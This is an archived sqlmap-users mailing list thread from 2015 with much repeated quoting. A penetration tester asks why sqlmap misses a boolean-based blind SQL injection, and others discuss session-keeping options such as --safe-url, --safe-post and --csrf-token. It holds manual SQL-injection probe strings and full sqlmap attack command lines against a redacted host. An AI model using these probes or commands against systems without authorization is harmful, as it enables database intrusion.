> >>
> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd be
> >> more than happy to contribute some time to improve it so it can
> >> identify injectable parameters such as these in the future.
> >>
> >> Thanks,
> >>
> >> Al.
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> One dashboard for servers and applications across Physical-Virtual-Cloud
> >> Widest out-of-the-box monitoring support with 50+ applications
> >> Performance metrics, stats and reports that give you Actionable Insights
> >> Deep dive visibility with transaction tracing using APM Insight.
> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Alistair J. <amc...@gm...>]

Thanks for the quick reply.

The contents of the request file are as follows:

GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
Host: <redacted>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
x64; Trident/5.0)
Connection: close
Referer: <redacted>
Cookie: <redacted>

I've redacted some of the details as it's not appropriate to draw
attention to an internet facing application's SQLi vulnerability.

When providing the request file as part of the following command:
sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
--level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
'industries' -v 1

sqlmap executes as normal but cannot identify (and therefore cannot
exploit) the boolean-based blind vulnerability which I've verified
manually.

Thanks again,

Al.


On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
<mir...@gm...> wrote:
> And what is the content of request file?
>
> Bye
>
> On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...>
> wrote:
>>
>> Hi sqlmappers,
>>
>> I'm a fairly experienced user of sqlmap having used it extensively in
>> the past. I came across what appeared to pretty typical boolean-based
>> blind SQLi in an application I'm (legally) testing. However, for the
>> first time, I'm unable to get sqlmap to recognise the parameter as
>> vulnerable to exploit it further. And as we know, manually exploiting
>> blind SQLi is cumbersome to say the least.
>>
>> Here is a summary of the requests i've made to manually confirm the
>> vulnerability.
>>
>> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
>> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
>>
>> I've tried various sqlmap flags and thought the following command
>> would give me the best chance of success:
>>
>> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> 'industries' -v 1
>>
>> Note: the string 'industries' is text that appears in response A but
>> not response B.
>>
>> I've looked at the requests that sqlmap is sending in the background
>> (proxied through burp). It appears that it's attempting to exploit
>> this with the AND statement as it should but is not using single
>> quotes as per my example above.
>>
>> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd be
>> more than happy to contribute some time to improve it so it can
>> identify injectable parameters such as these in the future.
>>
>> Thanks,
>>
>> Al.
>>
>>
>> ------------------------------------------------------------------------------
>> One dashboard for servers and applications across Physical-Virtual-Cloud
>> Widest out-of-the-box monitoring support with 50+ applications
>> Performance metrics, stats and reports that give you Actionable Insights
>> Deep dive visibility with transaction tracing using APM Insight.
>> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Miroslav S. <mir...@gm...>]

And what is the content of request file?

Bye

On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...>
wrote:

> Hi sqlmappers,
>
> I'm a fairly experienced user of sqlmap having used it extensively in
> the past. I came across what appeared to pretty typical boolean-based
> blind SQLi in an application I'm (legally) testing. However, for the
> first time, I'm unable to get sqlmap to recognise the parameter as
> vulnerable to exploit it further. And as we know, manually exploiting
> blind SQLi is cumbersome to say the least.
>
> Here is a summary of the requests i've made to manually confirm the
> vulnerability.
>
> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
>
> I've tried various sqlmap flags and thought the following command
> would give me the best chance of success:
>
> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> 'industries' -v 1
>
> Note: the string 'industries' is text that appears in response A but
> not response B.
>
> I've looked at the requests that sqlmap is sending in the background
> (proxied through burp). It appears that it's attempting to exploit
> this with the AND statement as it should but is not using single
> quotes as per my example above.
>
> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd be
> more than happy to contribute some time to improve it so it can
> identify injectable parameters such as these in the future.
>
> Thanks,
>
> Al.
>
>
> ------------------------------------------------------------------------------
> One dashboard for servers and applications across Physical-Virtual-Cloud
> Widest out-of-the-box monitoring support with 50+ applications
> Performance metrics, stats and reports that give you Actionable Insights
> Deep dive visibility with transaction tracing using APM Insight.
> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Alistair J. <amc...@gm...>]

Hi sqlmappers,

I'm a fairly experienced user of sqlmap having used it extensively in
the past. I came across what appeared to pretty typical boolean-based
blind SQLi in an application I'm (legally) testing. However, for the
first time, I'm unable to get sqlmap to recognise the parameter as
vulnerable to exploit it further. And as we know, manually exploiting
blind SQLi is cumbersome to say the least.

Here is a summary of the requests i've made to manually confirm the
vulnerability.

/help/UserGuide.aspx?Sec=PackageSelection (returns response A)
/help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
/help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)

I've tried various sqlmap flags and thought the following command
would give me the best chance of success:

sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
--level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
'industries' -v 1

Note: the string 'industries' is text that appears in response A but
not response B.

I've looked at the requests that sqlmap is sending in the background
(proxied through burp). It appears that it's attempting to exploit
this with the AND statement as it should but is not using single
quotes as per my example above.

I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd be
more than happy to contribute some time to improve it so it can
identify injectable parameters such as these in the future.

Thanks,

Al.

Re: [sqlmap-users] how to send post request as safeurl

[Miroslav S. <mir...@gm...>]

Please update to the latest revision and use:

--safe-req=...req.txt --safe-freq=...

Bye

On Wed, Apr 22, 2015 at 3:08 PM, Vojtěch Polášek <kr...@gm...> wrote:

>  Well, so if I understand it right. Currently, --safe-url receives the URL
> to which the post request is going to be sent.
> --safe-post receives *only* POST data, no HTTP headers etc.
> There is no possibility to send some specific cookies or other HTTP
> headers currently with this safe thing. Am I right?
> Thanks for clarification. I am sorry if my description of problem wasn't
> exact enough.
> Vojta
>
> On 22.4.2015 14:52, Miroslav Stampar wrote:
>
> I'll just repeat a sentence from your original message:
>
> "Is there any possibility to supply a post request to safeurl?"
>
>  Bye
>
> On Wed, Apr 22, 2015 at 2:29 PM, Vojtěch Polášek <kr...@gm...>
> wrote:
>
>>  Hi,
>> I tried your new --safe-post and it doesn't seem to fullfill my needs. I
>> need to submit in this url same cookies as in requests for SQL injection
>> etc. Would it be possible to provide something like --safe-request and read
>> request from a file?
>> Thanks,
>> Vojta
>>
>>
>> On 20.4.2015 23:56, Miroslav Stampar wrote:
>>
>>  Done (usage e.g. --safe-url=... --safe-post="foo=bar&...").
>>
>>  Bye
>>
>> On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar <
>> mir...@gm...> wrote:
>>
>>>  Pushing the patch in couple of hours.
>>>
>>>  Bye
>>>
>>> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <
>>> bpe...@gm...> wrote:
>>>
>>>> Ah, good point. Hadn't thought about that. Also, requiring a POST
>>>> request does make it difficult.
>>>>
>>>> On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...>
>>>> wrote:
>>>>
>>>>>  I dont think second order option will work as that is specifiing
>>>>> where to look for injection results, which might result in your underlying
>>>>> injection failing if the results are not to be found there.
>>>>>
>>>>> There is however options in latest version that appear to be for just
>>>>> this type of situation (although I personally haven't used them just yet):
>>>>>     --safe-url=SAFURL   URL address to visit frequently during testing
>>>>>     --safe-freq=SAFREQ  Test requests between two visits to a given
>>>>> safe URL
>>>>>
>>>>>  I believe this will ensure your session remains active during scan.
>>>>>
>>>>> There is also the options for CSRF tokens to be snagged and parsed via:
>>>>>     --csrf-token=CSR..  Parameter used to hold anti-CSRF token
>>>>>     --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token
>>>>>
>>>>>  In case the csrf token needs to be refreshed for each injection (when
>>>>> injecting into forms and other typical POST injections and such).
>>>>>
>>>>> On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry <
>>>>> bpe...@gm...> wrote:
>>>>>
>>>>>> However, that being said, I have run into this before and had to
>>>>>> write my own exploits to fully exploit the vulnerability.
>>>>>>
>>>>>> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry <
>>>>>> bpe...@gm...> wrote:
>>>>>>
>>>>>>> There is a second order parameter, it could be used to perform this.
>>>>>>> It would be requested after ever injected request were sent.
>>>>>>>
>>>>>>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...>
>>>>>>> wrote:
>>>>>>>
>>>>>>>> Greetings,
>>>>>>>> I am testing an application which I suspect to log me out if I don't
>>>>>>>> send certain post request in certain time interval.
>>>>>>>> Is this possible to do with Sqlmap? I know that there is a parameter
>>>>>>>> which lets me to run any python code before every request. But it
>>>>>>>> is not
>>>>>>>> so nice, let's say.
>>>>>>>> Is there any possibility to supply a post request to safeurl? Is
>>>>>>>> there
>>>>>>>> anything like this planed?
>>>>>>>> Thank you very much,
>>>>>>>> Vojta
>>>>>>>>
>>>>>>>>
>>>>>>>> ------------------------------------------------------------------------------
>>>>>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>>>>>>> Develop your own process in accordance with the BPMN 2 standard
>>>>>>>> Learn Process modeling best practices with Bonita BPM through live
>>>>>>>> exercises
>>>>>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>>>>>>> event?utm_
>>>>>>>>
>>>>>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>>>>>>> _______________________________________________
>>>>>>>> sqlmap-users mailing list
>>>>>>>> sql...@li...
>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>   --
>>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>>> http://www.volatileminds.net -- website
>>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>  --
>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>> http://www.volatileminds.net -- website
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>>>>> Develop your own process in accordance with the BPMN 2 standard
>>>>>> Learn Process modeling best practices with Bonita BPM through live
>>>>>> exercises
>>>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>>>>> event?utm_
>>>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>>
>>>>
>>>>
>>>>  --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>>> Develop your own process in accordance with the BPMN 2 standard
>>>> Learn Process modeling best practices with Bonita BPM through live
>>>> exercises
>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>>> event?utm_
>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>> --
>>>   Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>>
>> ------------------------------------------------------------------------------
>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>> Develop your own process in accordance with the BPMN 2 standard
>> Learn Process modeling best practices with Bonita BPM through live exerciseshttp://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>
>>
>>
>> _______________________________________________
>> sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>> Develop your own process in accordance with the BPMN 2 standard
>> Learn Process modeling best practices with Bonita BPM through live
>> exercises
>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>> event?utm_
>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
>  --
> Miroslav Stampar
> http://about.me/stamparm
>
>
>
>
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live
> exercises
> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
> event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] how to send post request as safeurl

[Miroslav S. <mir...@gm...>]

I'll just repeat a sentence from your original message:

"Is there any possibility to supply a post request to safeurl?"

Bye

On Wed, Apr 22, 2015 at 2:29 PM, Vojtěch Polášek <kr...@gm...> wrote:

>  Hi,
> I tried your new --safe-post and it doesn't seem to fullfill my needs. I
> need to submit in this url same cookies as in requests for SQL injection
> etc. Would it be possible to provide something like --safe-request and read
> request from a file?
> Thanks,
> Vojta
>
>
> On 20.4.2015 23:56, Miroslav Stampar wrote:
>
>  Done (usage e.g. --safe-url=... --safe-post="foo=bar&...").
>
>  Bye
>
> On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>>  Pushing the patch in couple of hours.
>>
>>  Bye
>>
>> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <bpe...@gm...
>> > wrote:
>>
>>> Ah, good point. Hadn't thought about that. Also, requiring a POST
>>> request does make it difficult.
>>>
>>> On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...>
>>> wrote:
>>>
>>>>  I dont think second order option will work as that is specifiing
>>>> where to look for injection results, which might result in your underlying
>>>> injection failing if the results are not to be found there.
>>>>
>>>> There is however options in latest version that appear to be for just
>>>> this type of situation (although I personally haven't used them just yet):
>>>>     --safe-url=SAFURL   URL address to visit frequently during testing
>>>>     --safe-freq=SAFREQ  Test requests between two visits to a given
>>>> safe URL
>>>>
>>>>  I believe this will ensure your session remains active during scan.
>>>>
>>>> There is also the options for CSRF tokens to be snagged and parsed via:
>>>>     --csrf-token=CSR..  Parameter used to hold anti-CSRF token
>>>>     --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token
>>>>
>>>>  In case the csrf token needs to be refreshed for each injection (when
>>>> injecting into forms and other typical POST injections and such).
>>>>
>>>> On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry <
>>>> bpe...@gm...> wrote:
>>>>
>>>>> However, that being said, I have run into this before and had to write
>>>>> my own exploits to fully exploit the vulnerability.
>>>>>
>>>>> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry <
>>>>> bpe...@gm...> wrote:
>>>>>
>>>>>> There is a second order parameter, it could be used to perform this.
>>>>>> It would be requested after ever injected request were sent.
>>>>>>
>>>>>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...>
>>>>>> wrote:
>>>>>>
>>>>>>> Greetings,
>>>>>>> I am testing an application which I suspect to log me out if I don't
>>>>>>> send certain post request in certain time interval.
>>>>>>> Is this possible to do with Sqlmap? I know that there is a parameter
>>>>>>> which lets me to run any python code before every request. But it is
>>>>>>> not
>>>>>>> so nice, let's say.
>>>>>>> Is there any possibility to supply a post request to safeurl? Is
>>>>>>> there
>>>>>>> anything like this planed?
>>>>>>> Thank you very much,
>>>>>>> Vojta
>>>>>>>
>>>>>>>
>>>>>>> ------------------------------------------------------------------------------
>>>>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>>>>>> Develop your own process in accordance with the BPMN 2 standard
>>>>>>> Learn Process modeling best practices with Bonita BPM through live
>>>>>>> exercises
>>>>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>>>>>> event?utm_
>>>>>>>
>>>>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>   --
>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>> http://www.volatileminds.net -- website
>>>>>>
>>>>>
>>>>>
>>>>>
>>>>>  --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>>>> Develop your own process in accordance with the BPMN 2 standard
>>>>> Learn Process modeling best practices with Bonita BPM through live
>>>>> exercises
>>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>>>> event?utm_
>>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>>
>>>
>>>
>>>  --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>> Develop your own process in accordance with the BPMN 2 standard
>>> Learn Process modeling best practices with Bonita BPM through live
>>> exercises
>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>> event?utm_
>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>>   Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live exerciseshttp://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>
>
>
> _______________________________________________
> sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live
> exercises
> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
> event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] how to send post request as safeurl

[Vojtěch P. <kr...@gm...>]

Well, so if I understand it right. Currently, --safe-url receives the
URL to which the post request is going to be sent.
--safe-post receives *only* POST data, no HTTP headers etc.
There is no possibility to send some specific cookies or other HTTP
headers currently with this safe thing. Am I right?
Thanks for clarification. I am sorry if my description of problem wasn't
exact enough.
Vojta
On 22.4.2015 14:52, Miroslav Stampar wrote:
> I'll just repeat a sentence from your original message:
>
> "Is there any possibility to supply a post request to safeurl?"
>
> Bye
>
> On Wed, Apr 22, 2015 at 2:29 PM, Vojtěch Polášek <kr...@gm...
> <mailto:kr...@gm...>> wrote:
>
>     Hi,
>     I tried your new --safe-post and it doesn't seem to fullfill my
>     needs. I need to submit in this url same cookies as in requests
>     for SQL injection etc. Would it be possible to provide something
>     like --safe-request and read request from a file?
>     Thanks,
>     Vojta
>
>
>     On 20.4.2015 23:56, Miroslav Stampar wrote:
>>     Done (usage e.g. --safe-url=... --safe-post="foo=bar&...").
>>
>>     Bye
>>
>>     On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar
>>     <mir...@gm... <mailto:mir...@gm...>>
>>     wrote:
>>
>>         Pushing the patch in couple of hours.
>>
>>         Bye
>>
>>         On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry
>>         <bpe...@gm...
>>         <mailto:bpe...@gm...>> wrote:
>>
>>             Ah, good point. Hadn't thought about that. Also,
>>             requiring a POST request does make it difficult.
>>
>>             On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe
>>             <hoo...@gm... <mailto:hoo...@gm...>> wrote:
>>
>>                 I dont think second order option will work as that is
>>                 specifiing where to look for injection results, which
>>                 might result in your underlying injection failing if
>>                 the results are not to be found there.
>>
>>                 There is however options in latest version that
>>                 appear to be for just this type of situation
>>                 (although I personally haven't used them just yet):
>>                     --safe-url=SAFURL   URL address to visit
>>                 frequently during testing
>>                     --safe-freq=SAFREQ  Test requests between two
>>                 visits to a given safe URL
>>
>>                 I believe this will ensure your session remains
>>                 active during scan.
>>
>>                 There is also the options for CSRF tokens to be
>>                 snagged and parsed via:
>>                     --csrf-token=CSR..  Parameter used to hold
>>                 anti-CSRF token
>>                     --csrf-url=CSRFURL  URL address to visit to
>>                 extract anti-CSRF token
>>
>>                 In case the csrf token needs to be refreshed for each
>>                 injection (when injecting into forms and other
>>                 typical POST injections and such).
>>
>>                 On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry
>>                 <bpe...@gm...
>>                 <mailto:bpe...@gm...>> wrote:
>>
>>                     However, that being said, I have run into this
>>                     before and had to write my own exploits to fully
>>                     exploit the vulnerability.
>>
>>                     On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry
>>                     <bpe...@gm...
>>                     <mailto:bpe...@gm...>> wrote:
>>
>>                         There is a second order parameter, it could
>>                         be used to perform this. It would be
>>                         requested after ever injected request were sent.
>>
>>                         On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch
>>                         Polášek <kr...@gm...
>>                         <mailto:kr...@gm...>> wrote:
>>
>>                             Greetings,
>>                             I am testing an application which I
>>                             suspect to log me out if I don't
>>                             send certain post request in certain time
>>                             interval.
>>                             Is this possible to do with Sqlmap? I
>>                             know that there is a parameter
>>                             which lets me to run any python code
>>                             before every request. But it is not
>>                             so nice, let's say.
>>                             Is there any possibility to supply a post
>>                             request to safeurl? Is there
>>                             anything like this planed?
>>                             Thank you very much,
>>                             Vojta
>>
>>                             ------------------------------------------------------------------------------
>>                             BPM Camp - Free Virtual Workshop May 6th
>>                             at 10am PDT/1PM EDT
>>                             Develop your own process in accordance
>>                             with the BPMN 2 standard
>>                             Learn Process modeling best practices
>>                             with Bonita BPM through live exercises
>>                             http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>                             event?utm_
>>                             source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>                             _______________________________________________
>>                             sqlmap-users mailing list
>>                             sql...@li...
>>                             <mailto:sql...@li...>
>>                             https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
>>                         -- 
>>                         http://volatile-minds.blogspot.com -- blog
>>                         http://www.volatileminds.net -- website
>>
>>
>>
>>
>>                     -- 
>>                     http://volatile-minds.blogspot.com -- blog
>>                     http://www.volatileminds.net -- website
>>
>>                     ------------------------------------------------------------------------------
>>                     BPM Camp - Free Virtual Workshop May 6th at 10am
>>                     PDT/1PM EDT
>>                     Develop your own process in accordance with the
>>                     BPMN 2 standard
>>                     Learn Process modeling best practices with Bonita
>>                     BPM through live exercises
>>                     http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>                     event?utm_
>>                     source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>                     _______________________________________________
>>                     sqlmap-users mailing list
>>                     sql...@li...
>>                     <mailto:sql...@li...>
>>                     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
>>
>>             -- 
>>             http://volatile-minds.blogspot.com -- blog
>>             http://www.volatileminds.net -- website
>>
>>             ------------------------------------------------------------------------------
>>             BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>             Develop your own process in accordance with the BPMN 2
>>             standard
>>             Learn Process modeling best practices with Bonita BPM
>>             through live exercises
>>             http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>             event?utm_
>>             source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>             _______________________________________________
>>             sqlmap-users mailing list
>>             sql...@li...
>>             <mailto:sql...@li...>
>>             https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
>>         -- 
>>         Miroslav Stampar
>>         http://about.me/stamparm
>>
>>
>>
>>
>>     -- 
>>     Miroslav Stampar
>>     http://about.me/stamparm
>>
>>
>>     ------------------------------------------------------------------------------
>>     BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>     Develop your own process in accordance with the BPMN 2 standard
>>     Learn Process modeling best practices with Bonita BPM through live exercises
>>     http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
>>     source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>
>>
>>     _______________________________________________
>>     sqlmap-users mailing list
>>     sql...@li... <mailto:sql...@li...>
>>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>     ------------------------------------------------------------------------------
>     BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>     Develop your own process in accordance with the BPMN 2 standard
>     Learn Process modeling best practices with Bonita BPM through live
>     exercises
>     http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>     event?utm_
>     source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>     _______________________________________________
>     sqlmap-users mailing list
>     sql...@li...
>     <mailto:sql...@li...>
>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] how to send post request as safeurl

[Vojtěch P. <kr...@gm...>]

Hi,
I tried your new --safe-post and it doesn't seem to fullfill my needs. I
need to submit in this url same cookies as in requests for SQL injection
etc. Would it be possible to provide something like --safe-request and
read request from a file?
Thanks,
Vojta

On 20.4.2015 23:56, Miroslav Stampar wrote:
> Done (usage e.g. --safe-url=... --safe-post="foo=bar&...").
>
> Bye
>
> On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar
> <mir...@gm... <mailto:mir...@gm...>> wrote:
>
>     Pushing the patch in couple of hours.
>
>     Bye
>
>     On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry
>     <bpe...@gm... <mailto:bpe...@gm...>> wrote:
>
>         Ah, good point. Hadn't thought about that. Also, requiring a
>         POST request does make it difficult.
>
>         On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe
>         <hoo...@gm... <mailto:hoo...@gm...>> wrote:
>
>             I dont think second order option will work as that is
>             specifiing where to look for injection results, which
>             might result in your underlying injection failing if the
>             results are not to be found there.
>
>             There is however options in latest version that appear to
>             be for just this type of situation (although I personally
>             haven't used them just yet):
>                 --safe-url=SAFURL   URL address to visit frequently
>             during testing
>                 --safe-freq=SAFREQ  Test requests between two visits
>             to a given safe URL
>
>             I believe this will ensure your session remains active
>             during scan.
>
>             There is also the options for CSRF tokens to be snagged
>             and parsed via:
